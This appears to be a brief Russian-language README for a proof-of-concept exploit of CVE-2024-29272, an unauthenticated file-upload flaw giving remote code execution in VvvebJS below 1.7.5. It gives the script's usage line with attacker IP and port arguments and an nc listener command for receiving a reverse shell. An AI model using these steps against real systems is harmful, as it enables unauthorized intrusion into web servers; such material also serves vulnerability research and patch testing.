
Это Proof-of-Concept для CVE-2024-29272, неаутентифицированная уязвимость произвольной загрузки файлов, которая приводит к удаленному выполнению кода в версиях VvvebJS < 1.7.5
использование:
python3 poc.py -u <URL> -l <ATTACKER IP> -p <ATTACKER PORT>
в другом терминале:
nc -lvnp <ATTACKER PORT>